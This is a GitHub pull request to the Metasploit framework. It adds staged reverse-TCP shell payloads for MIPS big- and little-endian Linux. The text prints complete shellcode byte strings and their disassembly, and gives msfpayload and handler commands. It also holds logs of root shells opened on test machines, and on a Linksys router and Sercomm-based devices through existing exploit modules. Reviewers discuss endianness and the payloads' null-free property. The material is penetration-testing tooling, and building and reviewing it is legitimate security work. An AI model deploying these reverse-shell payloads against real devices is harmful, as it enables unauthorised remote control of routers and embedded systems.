Add shell/reverse_tcp payloads for MIPS (little and big endian) #2881

Merged
merged 2 commits into from
Jan 15, 2014

Conversation

jvazquez-r7
Contributor

Summary of changes:

  • Adds the shell stage, compatible with mips be and mips le
  • Adds the reverse_tcp stager for mips be (null free)
  • Adds the reverse_tcp stager for mips le (null free)
  • Adds a function to metasm_shell.rb to make it easier to obtain the payload strings.

TODO:

  • I need to optimize the stagers a little. In the next pull request; the time available for this PR has expired.
  • Add bind_tcp stagers. In the next pull request; the time available for this PR has expired.

Verification

mipsle

  • Use msfpayload to create an ELF embedding the stager
juans-mbp:metasploit-framework juan$ ./msfpayload linux/mipsle/shell/reverse_tcp LHOST=192.168.172.1 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsle/shell/reverse_tcp
 Length: 212
Options: {"LHOST"=>"192.168.172.1"}
  • Run msfconsole and use exploit/multi/handler to set up a handler listening for the payload
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...

  • Upload the ELF created with msfpayload to a MIPS LE machine, make it executable (+x) and run it!
juan@debian:~/test$ ls -la shell.elf 
-rw-r--r-- 1 juan juan 296 Jan  8 23:23 shell.elf
juan@debian:~/test$ chmod +x shell.elf 
juan@debian:~/test$ ./shell.elf
  • You should now be enjoying a session in msfconsole
[*] Starting the payload handler...
[*] Sending stage (84 bytes) to 192.168.172.134
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:59129) at 2014-01-14 14:20:26 -0600

uname -a
Linux debian 2.6.32-5-4kc-malta #1 Fri Feb 15 18:09:19 UTC 2013 mips GNU/Linux
ls
shell.elf
^C
Abort session 3? [y/N]  y

[*] 192.168.172.134 - Command shell session 3 closed.  Reason: User exit

mipsbe

  • Use msfpayload to create an ELF embedding the stager
juans-mbp:metasploit-framework juan$ ./msfpayload linux/mipsbe/shell/reverse_tcp LHOST=192.168.172.1 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsbe/shell/reverse_tcp
 Length: 212
Options: {"LHOST"=>"192.168.172.1"}
  • Run msfconsole and use exploit/multi/handler to set up a handler listening for the payload
msf exploit(handler) > set payload linux/mipsbe/shell/reverse_tcp 
payload => linux/mipsbe/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...

  • Upload the ELF created with msfpayload to a MIPS BE machine, make it executable (+x) and run it!
juan@mipsdebian:~/test$ ls -la
total 12
drwxr-xr-x 2 juan juan 4096 Jan 11 07:29 .
drwxr-xr-x 4 juan juan 4096 Jan 11 07:29 ..
-rw-r--r-- 1 juan juan  296 Jan 11 07:29 shell.elf
juan@mipsdebian:~/test$ chmod +x shell.elf 
juan@mipsdebian:~/test$ ./shell.elf 

  • You should now be enjoying a session in msfconsole
[*] Starting the payload handler...
[*] Sending stage (84 bytes) to 192.168.172.134
[*] Command shell session 4 opened (192.168.172.1:4444 -> 192.168.172.134:59130) at 2014-01-14 14:23:25 -0600

uname -a
Linux mipsdebian 2.6.32-5-4kc-malta #1 Sat Feb 16 12:43:42 UTC 2013 mips GNU/Linux
ls
shell.elf
file shell.elf
shell.elf: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size

payload generation with tools/metasm_shell.rb

  • Run tools/metasm_shell.rb with the -a mips -e big options; the shell should appear:
juans-mbp:metasploit-framework juan$ tools/metasm_shell.rb -a mips -e big 
type "exit" or "quit" to quit
use ";" or "\n" for newline
type "file <file>" to parse a GAS assembler source file

metasm > 
  • VERIFY that there is a new line about how to use the shell:
type "file <file>" to parse a GAS assembler source file
  • run file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s (adjust the path if necessary); the following output should be produced:
metasm > file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
Reading file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
buf = 
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
"\xf8\x09"



entrypoint_0:
    li $t7, -6                                   ; @0  240ffffa  
    not $t7, $t7                                 ; @4  01e07827  
    addi $a0, $t7, -3                            ; @8  21e4fffd  
    addi $a1, $t7, -3                            ; @0ch  21e5fffd  
    slti $a2, $zero, -1                          ; @10h  2806ffff  
    li $v0, 1057h                                ; @14h  24021057  
    syscall 40404h                               ; @18h  0101010c  
    sw $v0, -4($sp)                              ; @1ch  afa2fffc  
    lw $a0, -4($sp)                              ; @20h  8fa4fffc  
    li $t7, -3                                   ; @24h  240ffffd  
    not $t7, $t7                                 ; @28h  01e07827  
    sw $t7, -20h($sp)                            ; @2ch  afafffe0  
    lui $t6, 115ch                               ; @30h  3c0e115c  
    sw $t6, -1ch($sp)                            ; @34h  afaeffe4  
    lui $t6, 7f00h                               ; @38h  3c0e7f00  
    ori $t6, $t6, 1                              ; @3ch  35ce0001  
    sw $t6, -1ah($sp)                            ; @40h  afaeffe6  
    addiu $a1, $sp, -1eh                         ; @44h  27a5ffe2  
    li $t4, -11h                                 ; @48h  240cffef  
    not $a2, $t4                                 ; @4ch  01803027  
    li $v0, 104ah                                ; @50h  2402104a  
    syscall 40404h                               ; @54h  0101010c  
    li $a0, -1                                   ; @58h  2404ffff  
    li $a1, 1001h                                ; @5ch  24051001  
    addi $a1, $a1, -1                            ; @60h  20a5ffff  
    li $t1, -8                                   ; @64h  2409fff8  
    not $t1, $t1                                 ; @68h  01204827  
    add $a2, $t1, $zero                          ; @6ch  01203020  
    li $a3, 802h                                 ; @70h  24070802  
    li $t3, -16h                                 ; @74h  240bffea  
    not $t3, $t3                                 ; @78h  01605827  
    add $t3, $sp, $t3                            ; @7ch  03ab5820  
    sw $zero, -1($t3)                            ; @80h  ad60ffff  
    sw $v0, -5($t3)                              ; @84h  ad62fffb  
    li $v0, 0ffah                                ; @88h  24020ffa  
    syscall 40404h                               ; @8ch  0101010c  
    sw $v0, -8($sp)                              ; @90h  afa2fff8  
    lw $a0, -4($sp)                              ; @94h  8fa4fffc  
    lw $a1, -8($sp)                              ; @98h  8fa5fff8  
    li $a2, 1001h                                ; @9ch  24061001  
    addi $a2, $a2, -1                            ; @0a0h  20c6ffff  
    li $v0, 0fa3h                                ; @0a4h  24020fa3  
    syscall 40404h                               ; @0a8h  0101010c  
    lw $a0, -8($sp)                              ; @0ach  8fa4fff8  
    add $a1, $v0, $zero                          ; @0b0h  00402820  
    li $t1, -3                                   ; @0b4h  2409fffd  
    not $t1, $t1                                 ; @0b8h  01204827  
    add $a2, $t1, $zero                          ; @0bch  01203020  
    li $v0, 1033h                                ; @0c0h  24021033  
    syscall 40404h                               ; @0c4h  0101010c  
    lw $s1, -8($sp)                              ; @0c8h  8fb1fff8  
    lw $s2, -4($sp)                              ; @0cch  8fb2fffc  
    jalr $s1                                     ; @0d0h  0220f809  noreturn
  • VERIFY that the buf Ruby string is the same as the one included in payloads/stagers/linux/mipsbe/reverse_tcp.rb
  • run file external/source/shellcode/linux/mips/stage_tcp_shell.s (adjust the path if necessary); the following output should be produced:
metasm > file external/source/shellcode/linux/mips/stage_tcp_shell.s
Reading file external/source/shellcode/linux/mips/stage_tcp_shell.s
buf = 
"\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" +
"\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" +
"\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" +
"\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" +
"\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" +
"\x0f\xab\x01\x01\x01\x0c"



entrypoint_0:
    li $s1, -3                                   ; @0  2411fffd  
    not $s1, $s1                                 ; @4  02208827  
    add $a0, $s2, $zero                          ; @8  02402020  



// Xrefs: 20h
loc_0ch:
    add $a1, $s1, $zero                          ; @0ch  02202820  
    li $v0, 0fdfh                                ; @10h  24020fdf  
    syscall 40404h                               ; @14h  0101010c  
    li $s0, -1                                   ; @18h  2410ffff  
    addi $s1, $s1, -1                            ; @1ch  2231ffff  
    bne $s1, $s0, loc_0ch                        ; @20h  1611fffa  x:loc_0ch
    li $t8, -1                                   ; @24h  2418ffff  



// Xrefs: 28h
loc_28h:
    bltzal $t8, loc_28h                          ; @28h  0710ffff  noreturn x:loc_28h
    slti $t8, $zero, -1                          ; @2ch  2818ffff  


    addi $a0, $ra, 1ch                           ; @30h  23e4001c  
    sw $a0, -8($sp)                              ; @34h  afa4fff8  
    sw $zero, -4($sp)                            ; @38h  afa0fffc  
    addi $a1, $sp, -8                            ; @3ch  23a5fff8  
    slti $a2, $zero, -1                          ; @40h  2806ffff  
    li $v0, 0fabh                                ; @44h  24020fab  
    syscall 40404h                               ; @48h  0101010c  
  • VERIFY that the buf Ruby string is the same as the one included in payloads/stages/linux/mipsbe/shell.rb, minus the "\x2f\x62\x69\x6e\x2f\x73\x68\x00" suffix. (That is the "/bin/sh" string, which metasm doesn't disassemble.)
  • Type exit to leave the metasm shell
  • Run tools/metasm_shell.rb with the -a mips -e little options; the shell should appear:
  • run file external/source/shellcode/linux/mipsle/stager_sock_reverse.s (adjust the path if necessary); the following output should be produced:
metasm > file external/source/shellcode/linux/mipsle/stager_sock_reverse.s
Reading file external/source/shellcode/linux/mipsle/stager_sock_reverse.s
buf = 
"\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
"\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
"\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
"\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
"\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
"\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
"\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
"\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
"\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
"\x20\x02"



entrypoint_0:
    li $t7, -6                                   ; @0  faff0f24  
    not $t7, $t7                                 ; @4  2778e001  
    addi $a0, $t7, -3                            ; @8  fdffe421  
    addi $a1, $t7, -3                            ; @0ch  fdffe521  
    slti $a2, $zero, -1                          ; @10h  ffff0628  
    li $v0, 1057h                                ; @14h  57100224  
    syscall 40404h                               ; @18h  0c010101  
    sw $v0, -4($sp)                              ; @1ch  fcffa2af  
    lw $a0, -4($sp)                              ; @20h  fcffa48f  
    li $t7, -3                                   ; @24h  fdff0f24  
    not $t7, $t7                                 ; @28h  2778e001  
    sw $t7, -1eh($sp)                            ; @2ch  e2ffafaf  
    li $t6, 5c11h                                ; @30h  115c0e34  
    sw $t6, -1ch($sp)                            ; @34h  e4ffaeaf  
    lui $t6, 100h                                ; @38h  00010e3c  
    ori $t6, $t6, 7fh                            ; @3ch  7f00ce35  
    sw $t6, -1ah($sp)                            ; @40h  e6ffaeaf  
    addiu $a1, $sp, -1eh                         ; @44h  e2ffa527  
    li $t4, -11h                                 ; @48h  efff0c24  
    not $a2, $t4                                 ; @4ch  27308001  
    li $v0, 104ah                                ; @50h  4a100224  
    syscall 40404h                               ; @54h  0c010101  
    li $a0, -1                                   ; @58h  ffff0424  
    li $a1, 1001h                                ; @5ch  01100524  
    addi $a1, $a1, -1                            ; @60h  ffffa520  
    li $t1, -8                                   ; @64h  f8ff0924  
    not $t1, $t1                                 ; @68h  27482001  
    add $a2, $t1, $zero                          ; @6ch  20302001  
    li $a3, 802h                                 ; @70h  02080724  
    li $t3, -16h                                 ; @74h  eaff0b24  
    not $t3, $t3                                 ; @78h  27586001  
    add $t3, $sp, $t3                            ; @7ch  2058ab03  
    sw $zero, -1($t3)                            ; @80h  ffff60ad  
    sw $v0, -5($t3)                              ; @84h  fbff62ad  
    li $v0, 0ffah                                ; @88h  fa0f0224  
    syscall 40404h                               ; @8ch  0c010101  
    sw $v0, -8($sp)                              ; @90h  f8ffa2af  
    lw $a0, -4($sp)                              ; @94h  fcffa48f  
    lw $a1, -8($sp)                              ; @98h  f8ffa58f  
    li $a2, 1001h                                ; @9ch  01100624  
    addi $a2, $a2, -1                            ; @0a0h  ffffc620  
    li $v0, 0fa3h                                ; @0a4h  a30f0224  
    syscall 40404h                               ; @0a8h  0c010101  
    lw $a0, -8($sp)                              ; @0ach  f8ffa48f  
    add $a1, $v0, $zero                          ; @0b0h  20284000  
    li $t1, -3                                   ; @0b4h  fdff0924  
    not $t1, $t1                                 ; @0b8h  27482001  
    add $a2, $t1, $zero                          ; @0bch  20302001  
    li $v0, 1033h                                ; @0c0h  33100224  
    syscall 40404h                               ; @0c4h  0c010101  
    lw $s1, -8($sp)                              ; @0c8h  f8ffb18f  
    lw $s2, -4($sp)                              ; @0cch  fcffb28f  
    jalr $s1                                     ; @0d0h  09f82002  noreturn
  • VERIFY that the buf Ruby string is the same as the one included in payloads/stagers/linux/mipsle/reverse_tcp.rb (the description originally said payloads/stagers/linux/mipsle/shell/reverse_tcp.rb; see the correction in the comments below)
  • run file external/source/shellcode/linux/mips/stage_tcp_shell.s (adjust the path if necessary); the following output should be produced:
metasm > file external/source/shellcode/linux/mips/stage_tcp_shell.s
Reading file external/source/shellcode/linux/mips/stage_tcp_shell.s
buf = 
"\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" +
"\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" +
"\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" +
"\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" +
"\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" +
"\x02\x24\x0c\x01\x01\x01"



entrypoint_0:
    li $s1, -3                                   ; @0  fdff1124  
    not $s1, $s1                                 ; @4  27882002  
    add $a0, $s2, $zero                          ; @8  20204002  



// Xrefs: 20h
loc_0ch:
    add $a1, $s1, $zero                          ; @0ch  20282002  
    li $v0, 0fdfh                                ; @10h  df0f0224  
    syscall 40404h                               ; @14h  0c010101  
    li $s0, -1                                   ; @18h  ffff1024  
    addi $s1, $s1, -1                            ; @1ch  ffff3122  
    bne $s1, $s0, loc_0ch                        ; @20h  faff1116  x:loc_0ch
    li $t8, -1                                   ; @24h  ffff1824  



// Xrefs: 28h
loc_28h:
    bltzal $t8, loc_28h                          ; @28h  ffff1007  noreturn x:loc_28h
    slti $t8, $zero, -1                          ; @2ch  ffff1828  


    addi $a0, $ra, 1ch                           ; @30h  1c00e423  
    sw $a0, -8($sp)                              ; @34h  f8ffa4af  
    sw $zero, -4($sp)                            ; @38h  fcffa0af  
    addi $a1, $sp, -8                            ; @3ch  f8ffa523  
    slti $a2, $zero, -1                          ; @40h  ffff0628  
    li $v0, 0fabh                                ; @44h  ab0f0224  
    syscall 40404h                               ; @48h  0c010101  
  • VERIFY that the buf Ruby string is the same as the one included in payloads/stages/linux/mipsle/shell.rb, minus the "\x2f\x62\x69\x6e\x2f\x73\x68\x00" suffix. (That is the "/bin/sh" string, which metasm doesn't disassemble.)

Extra validation step

  • Use the payloads with existing modules against real vulns :) enjoy shells! Example:
msf exploit(linksys_wrt110_cmd_exec) > show options

Module options (exploit/linux/http/linksys_wrt110_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            no        Password to login with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.1      yes       The address of the router
   RPORT     80               yes       The target port
   TIMEOUT   20               no        The timeout to use in every request
   USERNAME  admin            yes       Valid router administrator username
   VHOST                      no        HTTP server virtual host


Payload options (linux/mipsle/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux mipsel Payload


msf exploit(linksys_wrt110_cmd_exec) > exploit

[*] Started reverse handler on 192.168.1.100:4444 
[*] 192.168.1.1:80 - Trying to login with admin:admin
[+] 192.168.1.1:80 - Successful login admin:admin
Executable here: /tmp/UxZdC
[*] Sending stage (84 bytes) to 192.168.1.1
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.1:32778) at 2014-01-14 13:55:15 -0600
ls

[*] Command Stager progress - 100.00% done (1536/1536 bytes)

AdminDiag.htm
AdminManage.htm
AdminRebootConfig_Clicked.htm
AdminRebootConfig_Clicked_reboot.htm
AdminReport.htm
AdminRestore.htm

@mandreko
Contributor

To help test these out, I merged them into my local branch for PR #2874

Below are the results:

mipsbe

msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsbe/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.136    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   9   Netgear WPNT834


msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.1.136:4444
[*] Sending stage (84 bytes) to 192.168.1.1
[*] Command shell session 1 opened (192.168.1.136:4444 -> 192.168.1.136:3575) at 2014-01-14 16:15:56 -0500
[*] Command Stager progress - 100.00% done (1264/1264 bytes)

ls -al /
drwxr-xr-x    1 root     root          657 Dec 18  2005 bin
drwxr-xr-x    1 root     root          565 Dec 18  2005 dev
drwxr-xr-x    1 root     root          285 Dec 18  2005 etc
drwxr-xr-x    1 root     root            0 Dec 18  2005 home
drwxr-xr-x    1 root     root         3947 Dec 18  2005 htdocs
drwxr-xr-x    1 root     root          387 Dec 18  2005 lib
drwxr-xr-x    1 root     root            0 Dec 18  2005 mnt
dr-xr-xr-x   40 root     root            0 Dec 31  1999 proc
lrwxrwxrwx    1 root     root            3 Dec 18  2005 sbin -> bin
lrwxrwxrwx    1 root     root            7 Dec 18  2005 tmp -> var/tmp
drwxr-xr-x    1 root     root           21 Dec 18  2005 usr
drwxr-xr-x    1 root     root            0 Dec 31  1999 var

mipsle

msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.2      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsle/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.136    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Honeywell WAP-PL2 IP Camera


msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.1.136:4444
[*] Sending stage (84 bytes) to 192.168.1.2
[*] Command shell session 2 opened (192.168.1.136:4444 -> 192.168.1.2:4576) at 2014-01-14 16:21:05 -0500
[*] Command Stager progress - 100.00% done (1555/1555 bytes)

ls -al /
drwxrwxr-x   11 root     root           95 Sep  9  2011 .
drwxrwxr-x   11 root     root           95 Sep  9  2011 ..
drwxrwxr-x    2 root     root          276 Sep  9  2011 bin
drwxr-xr-x    3 root     root          646 Sep  9  2011 dev
drwxrwxr-x   10 root     root         1073 Sep  9  2011 etc
drwxrwxr-x    3 root     root          774 Sep  9  2011 lib
dr-xr-xr-x   55 root     root            0 Jan  1  2000 proc
drwxr-xr-x    2 root     root          172 Sep  9  2011 sbin
drwxr-xr-x    6 root     root            0 Jan 14 21:20 tmp
drwxrwxr-x    9 root     root           81 Sep  9  2011 usr
drwxr-xr-x    9 root     root            0 Jan  1  2010 var

@ghost ghost assigned jvennix-r7 Jan 15, 2014
@jvennix-r7
Contributor

Processing...

@jvennix-r7
Contributor

Shell session from mipsel:

msf exploit(handler) > [*] Sending stage (84 bytes) to 10.6.0.125
[*] Command shell session 1 opened (10.6.0.125:4444 -> 10.6.0.125:57177) at 2014-01-15 12:23:43 -0600
uname -a
[*] exec: uname -a

Darwin aus-mac-1073.aus.rapid7.com 12.5.0 Darwin Kernel Version 12.5.0: Mon Jul 29 16:33:49 PDT 2013; root:xnu-2050.48.11~1/RELEASE_X86_64 x86_64

@jvennix-r7
Contributor

mipsbe working well

msf exploit(handler) > [*] Sending stage (84 bytes) to 10.6.0.125
[*] Command shell session 2 opened (10.6.0.125:4444 -> 10.6.0.125:57184) at 2014-01-15 12:27:13 -0600

msf exploit(handler) > sessions -i 2 -c "uname -a"
[*] Running 'uname -a' on shell session 2 (10.6.0.125)
Linux debian-mips 2.6.32-5-4kc-malta #1 Wed Jan 12 11:14:32 UTC 2011 mips GNU/Linux

@jvennix-r7
Contributor

@jvazquez-r7 I am stuck on one of these steps:

VERIFY which the buf ruby string is the same than the one included on payloads/stagers/linux/mipsle/shell/reverse_tcp.rb

but that file does not exist in the repo

@jvazquez-r7
Contributor Author

sorry @jvennix-r7, you're right, it should be payloads/stagers/linux/mipsle/reverse_tcp.rb. Thanks!

@@ -0,0 +1,127 @@
##
Contributor

The mipsle and mipsbe stagers are very similar, maybe we should use gas's .def macros here instead of having two separate files?

@@ -57,11 +60,11 @@
  lw      $a0, -4($sp)
  li      $t7, -3
  nor     $t7, $t7, $zero
- sw      $t7, -32($sp)
- lui     $t6, 0x115c
+ sw      $t7, -30($sp)
+ ori     $t6, $zero, 0x5c11  # port
  sw      $t6, -28($sp)
- lui     $t6, 0x7f00          # ip
- ori     $t6, $t6, 0x0001     # ip
+ lui     $t6, 0x100          # ip
+ ori     $t6, $t6, 0x7f      # ip
  sw      $t6, -26($sp)
  addiu   $a1, $sp, -30
  li      $t4, -17
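Review bot: the little-endian immediates added here (`ori $t6, $zero, 0x5c11`, `lui $t6, 0x100`, `ori $t6, $t6, 0x7f`) need a comment saying why they differ from the removed mipsbe values (0x115c, 0x7f00/0x0001): `sw` writes $t6 low byte first, so each immediate is byte-swapped and the two address halves trade places so that the port lands in network order at -28($sp) and the address at -26($sp). Without that note the next reader has to re-derive why this file stores 0x100 where the mipsbe file stores 0x7f00. The `sw $t7, -30($sp)` change from -32 is likewise unexplained: it writes AF_INET as 02 00 00 00 starting at the sin_family slot and depends on the later `sw $t6, -28($sp)` overwriting the zero halfword with the port, so the order of those two stores is load-bearing and should be marked as such. Finally, both the removed and the added address immediates contain a 0x00 byte (0x7f00/0x0001 and 0x100/0x7f), so the "null free" property claimed in the description holds only once an LHOST/LPORT whose bytes are all non-zero has been substituted for the 127.0.0.1:4444 template values.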
@@ -120,7 +123,7 @@

Contributor

I see now in the PR "I need to optimize a little bit the stagers. In the next pull request. Time available expired for this pr", so I'm assuming this kind of stuff will be considered later. Merging now.

Contributor Author

yeah, I can do it for sure in the next pull request, but honestly I didn't take it into account in this PR because I wasn't aware of an easy trick to handle endianness with .def macros :S Guidance is super welcome, and I can add it for sure ASAP!

@jvennix-r7
Contributor

I will count @mandreko's field testing as verifying that last checkbox :)

@jvazquez-r7
Contributor Author

@jvennix-r7 honestly, I don't know how to make the proposed change to take endianness into account with .def macros, what a shame; would you mind sharing a reference or a sample with me? :?

jvennix-r7 pushed a commit that referenced this pull request Jan 15, 2014
@jvennix-r7 jvennix-r7 merged commit a056d93 into rapid7:master Jan 15, 2014
@jvazquez-r7 jvazquez-r7 deleted the misple_staged_shell_reverse_tcp branch November 18, 2014 15:52